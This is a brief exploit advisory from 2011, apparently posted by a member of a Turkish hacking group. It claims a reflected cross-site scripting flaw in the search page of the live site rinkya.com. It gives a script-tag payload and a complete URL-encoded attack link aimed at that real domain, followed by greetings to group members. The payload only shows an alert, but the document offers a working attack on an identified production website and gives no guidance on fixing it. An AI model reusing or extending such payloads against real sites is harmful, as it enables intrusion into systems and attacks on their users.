Rinkya suffers from a cross site scripting vulnerability.
de4fdece5dffe8f098690c6026b3e330848de2599c45b9b2872be49da80d375d
# Exploit Title: Rinkya Cross Site Scripting
# Date: 22.10.2011 - 17.52
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
-------------------------------------------------------------
search.php
http://www.rinkya.com/membership/search.php
"><script>alert("DDz Mr.PaPaRoSSe")</script>
http://www.rinkya.com/membership/search.php?sType=Auction&searchstring=%22%3E%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E&SUBMIT=Sorguyu+g%C3%B6nder
-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalýk - DarkCOD3R
[And DD'z Family]
[DarkDevilz - Defence And Destruction Group'z - TURKEY]